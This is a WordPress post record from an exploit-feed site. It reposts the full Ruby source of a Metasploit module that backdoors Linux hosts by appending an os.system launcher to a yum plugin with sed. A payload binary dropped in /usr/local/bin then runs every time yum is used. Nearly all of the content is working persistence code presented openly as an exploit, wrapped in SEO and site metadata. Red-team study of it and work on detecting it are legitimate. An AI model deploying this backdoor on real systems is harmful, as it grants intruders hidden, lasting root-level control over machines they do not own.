{"id":18149,"date":"2025-09-19T15:06:42","date_gmt":"2025-09-19T15:06:42","guid":{"rendered":"http:\/\/localhost\/?p=18149"},"modified":"2025-09-19T15:06:42","modified_gmt":"2025-09-19T15:06:42","slug":"yum-package-manager-persistence","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=18149","title":{"rendered":"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-19T19:07:39&#8243;,&#8221;description&#8221;:&#8221;This module will run a payload when the package manager is used.           This module modifies a yum plugin to launch a binary of choice.         &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;modified&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Yum Package Manager Persistence&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n  Rank = ExcellentRanking\\n\\n  include Msf::Exploit::EXE\\n  include Msf::Exploit::FileDropper\\n  include Msf::Post::File\\n  include Msf::Post::Linux::System\\n  include Msf::Exploit::Local::Persistence\\n  prepend Msf::Exploit::Remote::AutoCheck\\n  include Msf::Exploit::Deprecated\\n  moved_from &#8216;exploits\/linux\/local\/yum_package_manager_persistence&#8217;\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Yum Package Manager Persistence&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module will run a payload when the package manager is used.\\n          This module modifies a yum plugin to launch a binary of choice.\\n          grep -F &#8216;enabled=1&#8217; \/etc\/yum\/pluginconf.d\/\\n          will show what plugins are currently enabled on the system.\\n          root persmissions are likely required.\\n          Verified on Centos 7.1\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [&#8216;Aaron Ringo&#8217;],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;, &#8216;unix&#8217;],\\n        &#8216;Arch&#8217; =\\u003e [\\n          ARCH_CMD,\\n          ARCH_X86,\\n          ARCH_X64,\\n          ARCH_ARMLE,\\n          ARCH_AARCH64,\\n          ARCH_PPC,\\n          ARCH_MIPSLE,\\n          ARCH_MIPSBE\\n        ],\\n        &#8216;SessionTypes&#8217; =\\u003e [&#8216;shell&#8217;, &#8216;meterpreter&#8217;],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2003-12-17&#8217;, # Date published, Robert G. Browns documentation on Yum\\n        &#8216;References&#8217; =\\u003e [&#8216;URL&#8217;, &#8216;https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_enterprise_linux\/6\/html\/deployment_guide\/sec-yum_plugins&#8217;],\\n        &#8216;Targets&#8217; =\\u003e [[&#8216;Automatic&#8217;, {}]],\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Privileged&#8217; =\\u003e true,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n          &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        # \/usr\/lib\/yum-plugins\/fastestmirror.py is a default enabled plugin in centos\\n        OptString.new(&#8216;PLUGIN&#8217;, [true, &#8216;Yum Plugin to target&#8217;, &#8216;fastestmirror.py&#8217;]),\\n        OptString.new(&#8216;PAYLOAD_NAME&#8217;, [false, &#8216;Name of binary to write&#8217;])\\n      ]\\n    )\\n\\n    register_advanced_options(\\n      [\\n        OptString.new(&#8216;WritableDir&#8217;, [true, &#8216;A directory where we can write files&#8217;, &#8216;\/usr\/local\/bin\/&#8217;]),\\n        OptString.new(&#8216;PluginPath&#8217;, [true, &#8216;Plugin Path to use&#8217;, &#8216;\/usr\/lib\/yum-plugins\/&#8217;])\\n      ]\\n    )\\n  end\\n\\n  def check\\n    return CheckCode::Safe(\\&#8221;#{datastore[&#8216;WritableDir&#8217;]} does not exist\\&#8221;) unless exists? datastore[&#8216;WritableDir&#8217;]\\n    return CheckCode::Safe(\\&#8221;#{datastore[&#8216;WritableDir&#8217;]} not writable\\&#8221;) unless writable? datastore[&#8216;WritableDir&#8217;]\\n\\n    # checks \/usr\/lib\/yum-plugins\/PLUGIN.py exists and is writeable\\n    plugin = datastore[&#8216;PLUGIN&#8217;]\\n    full_plugin_path = \\&#8221;#{datastore[&#8216;PluginPath&#8217;]}#{plugin}\\&#8221;\\n    return CheckCode::Safe(\\&#8221;#{full_plugin_path} does not exist\\&#8221;) unless exists? full_plugin_path\\n    return CheckCode::Safe(\\&#8221;#{full_plugin_path} not writable\\&#8221;) unless writable? full_plugin_path\\n    return CheckCode::Safe(&#8216;yum not found on system&#8217;) unless command_exists? &#8216;yum&#8217;\\n    return CheckCode::Safe(&#8216;sed not found on system, required for exploitation&#8217;) unless command_exists? &#8216;sed&#8217;\\n\\n    # \/etc\/yum.conf must contain plugins=1 for plugins to run at all\\n    plugins_enabled = cmd_exec \\&#8221;grep -F &#8216;plugins=1&#8217; \/etc\/yum.conf\\&#8221;\\n    return CheckCode::Safe(&#8216;Plugins are not set to be enabled in \/etc\/yum.conf&#8217;) unless plugins_enabled.include? &#8216;plugins=1&#8217;\\n\\n    vprint_good(&#8216;Plugins are enabled!&#8217;)\\n\\n    # \/etc\/yum\/pluginconf.d\/PLUGIN.conf must contain enabled=1\\n    plugin_conf = \\&#8221;\/etc\/yum\/pluginconf.d\/#{plugin.sub(&#8216;.py&#8217;, &#8221;)}.conf\\&#8221;\\n    plugin_enabled = cmd_exec \\&#8221;grep -F &#8216;enabled=1&#8217; #{plugin_conf}\\&#8221;\\n    unless plugin_enabled.include? &#8216;enabled=1&#8217;\\n      return CheckCode::Safe(\\&#8221;#{plugin_conf} plugin is not configured to run\\&#8221;)\\n    end\\n\\n    # check that the plugin contains an import os, to backdoor\\n    import_os_check = cmd_exec \\&#8221;grep -F &#8216;import os&#8217; #{full_plugin_path}\\&#8221;\\n    unless import_os_check.include? &#8216;import os&#8217;\\n      return CheckCode::Safe(\\&#8221;#{full_plugin_path} does not import os, which is odd\\&#8221;)\\n    end\\n\\n    CheckCode::Detected(&#8216;yum installed and plugin found, enabled, and backdoorable&#8217;)\\n  end\\n\\n  def install_persistence\\n    plugin = datastore[&#8216;PLUGIN&#8217;]\\n    full_plugin_path = \\&#8221;#{datastore[&#8216;PluginPath&#8217;]}\/#{plugin}\\&#8221;\\n\\n    # plugins are made in python and generate pycs on successful execution\\n    print_warning(&#8216;Either Yum has never been executed, or the selected plugin has not run&#8217;) unless exist? \\&#8221;#{full_plugin_path}c\\&#8221;\\n\\n    # check for write in backdoor path and set\/generate backdoor name\\n    payload_path = datastore[&#8216;WritableDir&#8217;]\\n    payload_path = payload_path.end_with?(&#8216;\/&#8217;) ? payload_path : \\&#8221;#{payload_path}\/\\&#8221;\\n    payload_name = datastore[&#8216;PAYLOAD_NAME&#8217;] || rand_text_alphanumeric(5..10)\\n    payload_path \\u003c\\u003c payload_name\\n\\n    # check for sed binary and then append launcher to plugin underneath\\n    print_status(&#8216;Attempting to modify plugin&#8217;)\\n    launcher = \\&#8221;os.system(&#8216;setsid #{payload_path} 2\\u003e\/dev\/null \\\\\\\\\\u0026 &#8216;)\\&#8221;\\n    sed_path = cmd_exec &#8216;command -v sed&#8217;\\n    unless sed_path.include?(&#8216;sed&#8217;)\\n      fail_with Failure::NotVulnerable, &#8216;Module uses sed to modify plugin, sed was not found&#8217;\\n    end\\n    sed_line = \\&#8221;#{sed_path} -ie \\\\\\&#8221;\/import os\/ a #{launcher}\\\\\\&#8221; #{full_plugin_path}\\&#8221;\\n    cmd_exec sed_line\\n\\n    # actually write users payload to be executed then check for write\\n    if payload.arch.first == &#8216;cmd&#8217;\\n      write_file(payload_path, payload.encoded)\\n    else\\n      write_file(payload_path, generate_payload_exe)\\n    end\\n    @clean_up_rc \\u003c\\u003c \\&#8221;rm #{payload_path}\\\\n\\&#8221;\\n    @clean_up_rc \\u003c\\u003c \\&#8221;execute -f #{sed_path} -a \\\\\\&#8221;-i \/os\\\\.system.*#{payload_name}\/d #{full_plugin_path}\\\\\\&#8221;\\&#8221;\\n    unless exist? payload_path\\n      fail_with Failure::Unknown, \\&#8221;Failed to write #{payload_path}\\&#8221;\\n    end\\n\\n    # change perms to reflect bins in \/usr\/local\/bin\/, give good feels\\n    chmod(payload_path, 0o755)\\n    print_status(\\&#8221;Backdoor uploaded to #{payload_path}\\&#8221;)\\n    print_good(&#8216;Backdoor will run on next Yum update&#8217;)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/persistence\/yum_package_manager.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/persistence\/yum_package_manager\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-19T19:07:39&#8243;,&#8221;description&#8221;:&#8221;This module will run a payload when the package manager is used. This module modifies a yum plugin to launch a binary of choice. &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;modified&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Yum&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-18149","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=18149\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-09-19T19:07:39&#8243;,&#8221;description&#8221;:&#8221;This module will run a payload when the package manager is used. This module modifies a yum plugin to launch a binary of choice. &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;modified&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Yum...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=18149\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-19T15:06:42+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-\",\"datePublished\":\"2025-09-19T15:06:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149\"},\"wordCount\":1104,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=18149#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149\",\"name\":\"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-09-19T15:06:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=18149\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18149#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=18149","og_locale":"en_US","og_type":"article","og_title":"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-09-19T19:07:39&#8243;,&#8221;description&#8221;:&#8221;This module will run a payload when the package manager is used. This module modifies a yum plugin to launch a binary of choice. &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;modified&#8221;:&#8221;2025-09-19T18:56:18&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Yum...","og_url":"https:\/\/zero.redgem.net\/?p=18149","og_site_name":"zero redgem","article_published_time":"2025-09-19T15:06:42+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=18149#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=18149"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-","datePublished":"2025-09-19T15:06:42+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=18149"},"wordCount":1104,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=18149#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=18149","url":"https:\/\/zero.redgem.net\/?p=18149","name":"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-09-19T15:06:42+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=18149#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=18149"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=18149#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Yum Package Manager Persistence_MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/18149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18149"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/18149\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}